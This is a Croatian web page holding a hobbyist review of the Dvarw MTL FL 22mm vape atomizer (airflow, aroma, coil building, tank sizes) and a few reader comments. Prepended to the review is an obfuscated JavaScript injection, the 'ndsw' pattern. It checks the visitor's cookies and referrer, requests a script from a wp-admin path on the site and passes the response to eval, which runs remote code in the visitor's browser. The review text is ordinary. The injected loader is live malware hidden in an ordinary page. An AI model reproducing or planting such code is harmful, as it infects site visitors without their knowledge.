;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Dvarw MTL FL 22mm – Recenzija by Bernard

Jednom davno, dok sam se još tražio kao vaper, upoznao sam jednog iskusnog vapera koji mi je dao da na kavi probam njegov atomizer za e-cigarete – Dvarw mtl (OG (staru) verziju). Ja sam ga tu večer sanjao. Dvarw, naravno 😊

Eto toliko me oduševio i pomutio mi um oko svega što sam probao do sada. Do tada nisam imao u vidu kakav airflow, throat hit i osjet arome želim, a ja sam se kod ovog atty-a zaljubio u baš te 3 komponente. Baš smo si sjeli na prvu. Kao i s ljudima, ako ti odmah ne sjednu, velika je vjerojatnost da neće nikada.

Taj (za mene) iskusan vaper ga je naravno nahvalio, jer je to bio njegov najdraži MTL atty, i sigurno je postojao hype koji je pojačao moje očigledno oduševljenje, ali u ovom slučaju nije bio lažan. Tada je „KHW Mods“ imao listu čekanja za Dvarw, jer je proizvodnja bila jako mala. Radilo se usmjereno na zadovoljstvo korisnika, a ne na masovnoj proizvodnji. Moram priznati da me je i to pridobilo i bio sam uvjeren da to mora biti dobar proizvod. Inače sam proračunat u smislu ću radije dati malo više novaca za nešto kvalitetno što ću dugo koristiti i biti zadovoljan.

Par tehničkih detalja

Ja ću dati svoj osvrt na novi Dvarw MTL FL, jer staru verziju ne proizvode više.

Krenimo od bitnijih tehničkih specifikacija i što Face Lift (FL) verziju čini boljom od stare verzije:

1. Kraći je od V1

2. Dimnjak napravljen od PEEK materijala

3. Postovi su razmaknutiji

4. Poboljšani utori za nogice grijača

5. Lakše punjenje odozdo, kraći navoj za odšarafiti tank

6. Viton o-ringovi, štogod to značilo

7. Dostupna verzija od 22 i 24mm, s tim da je build deck ostao isti, dakle širi je samo radi većeg kapaciteta

8. Chimeny ima utor u koji mora sjesti da bude u pravoj poziciji i skraćen je

Recenzija

Throat Hit Na novoj verziji je definitivno pojačan, i meni baš paše, ali nije pre jak. Definitivno nije nešto što bi te trebalo odvratiti od ovog atty-a jer se th može pojačati pojačavanjem PG-a. Aroma Odlična! Znam samo jednu osobu od njih 100 koja je rekla da joj je aroma ok. Ja bih rekao da je ovo jedan od nekolicine atty-a koji daje ispravnu aromu, baš onako kako treba. Neće naglasiti niti jednu notu tekućine i sve će se osjetiti kako treba. Pogotovo kompleksne arome.

Air flow Dvarw vani ima veliku rupu u koju ulazi zrak, i točno ispod coila ima prilagođenu rupu po tvojoj želji. Originalno dolazi sa rupicom od 1.2 mm. Netko pati na to da si može u bilo kojem trenutnu povećati ili smanjiti rupicu na airflow ringu. Ovdje se to ne može. Po meni to nije minus, jer znaš kakav airflow voliš. Ako ne znaš, malo ćeš više vremena potrošiti dok izmijeniš svaki pin i probaš, ali kad ga jednom nađeš nema potrebe za mrdanjem.

Veličine Dvarw-ova Dvarw, kada kupuješ novi original, možeš birati između 22 i 24mm. 22mm ima 3 veličine tankova: 2ml, 3,5ml i 5ml. 24mm ima 2 veličine tankova: 3,5ml i 6ml. Po mom osobno izboru je 22mm puno ljepši, jer sam navikao da je 24mm rezervirano za Dvarw DL FL. Kao što sam spomenuo, širina 24mm ne utječe na ništa drugo nego na veći kapacitet tekućine, jer je unutra sve bitno istih dimenzija u obje verzije. Jedino što utječe na promjenu arome je; niži tank će dati mrvicu bolju aromu nego viši tank, samo zato jer su ti na nižem usta bliže samom coilu.

Buildanje i wickanje Iskreno, buildanje i wickanje ne može biti lakše. Zaista je dizajniran da ga se može i žmirečki složiti. Ima nešto što me mrvicu smeta a to je što kada skidam tank, moram maknuti kapicu sa dimnjaka i sami dimnjak što je nešto više posla nego kod drugih atty-a na kojima samo odšarafiš tank i s njim se skine i dimnjak i poklopac dimnjaka. No sigruan sam da zbog takvog dizajna on nikada neće procuriti.

Pa krenimo ispočetka: Dvarw će prihvatiti bilo koju žicu. Probao sam sa običnom, round žicom debljina 28 i 26 ga. Probao sam sa različitim materijalima žica, i sa claptonima i alienima (koji su isključivo za mtl) i sve je bilo ok, i nije bilo neke pre velike razlike ako se držiš pravila: build to the deck 😊 Uglavnom stavljam 28ga kantal, 2,5mm promjer grijača i 5 namotaja, ako ide 26ga, onda 4 namotaja. Kažu neki da im je bolje stisnuti grijač, a ja volim savršeni minimalni spaced. Vatu je lagano postaviti kao na RDA, dakle, provučem ju, sa pincetom si dignem krajeve vate, provučem dimnjak, namjestim ga u poziciju i malo po-Fluff-am vatu, to je suprotno od stisnuti je 😊 i onda ju samo spustim da prekrije 2 diskretne rupice kroz koje dolazi tekućna. Obavezno staviti (never forget) poklopac dimnjaka, uliti tekućinu u tank i zašarafiti. Never forget se zove zato jer se svakom desi da ga zaboravit staviti i naravno, sve ti iscuri van, jer na drugim atty-ima nisi navikao da moraš o tome brinuti, jer kao što sam rekao, dimnjak i poklopac nisu vezani uz tank. Iskreno, navikao sam se na to da mi atty ne curi. jedino kada zna zasliniti je kad su fkt vrućine, ali to je zaista rijetko i ne bude to ga puno, desilo mi se 3 puta u 2 godine.

O izgledu nemam što pričati, moj osobni dojam je da je ovo najljepši atty na svijetu. I meni najdraži, jednostavno ga volim od početka, i sve što sam naknadno probao, nikada me nije odvratilo od njega, makar je i bilo nekoliko dobrih drugih atty-a u mojim rukama. Preporučam svakome da si nabavi jednog u svojoj kolekciji, ja gledam da uzmem trećeg. Naravno, postoje ljudi koji će reći da Dvarw ne pravda svoju cijenu, i da si kupiš tri Berserkera za cijenu jednog Dvarw-a. Ja se s takvim ljudima ne raspravljam jer jednostavno nismo istomišljenici i nema smisla. Ali shvaćam da je netko mogao kliknuti na prvu s nekim drugim atty-em i da svatko svog konja hvali.

Autor: Bernard Jugović

Choose your Reaction!
  • Najbolji tank koji sam probao ikada ! Izrada, preciznost navoja, slaganje vate, ukus – savršen, bogat, pun, kompleksan, najdraže potrošeni novci ! Čista 11-ica !

  • Da, odlična recenzija :) Mislim da ću ipak i ja u neko dogledno vrijeme isprobati to čudo od atomizera koje svi hvale.

  • Odlična recenzija. Uživao sam čitajući. Dijelim tvoje oduševljenje tankom. I meni ne izlazi iz ruku od kad je stigao i kao takav je veliko iznenađenje jer sam mislio da niti jedan tank nakon GTR-a neće doći u tu kategoriju.

Leave a Comment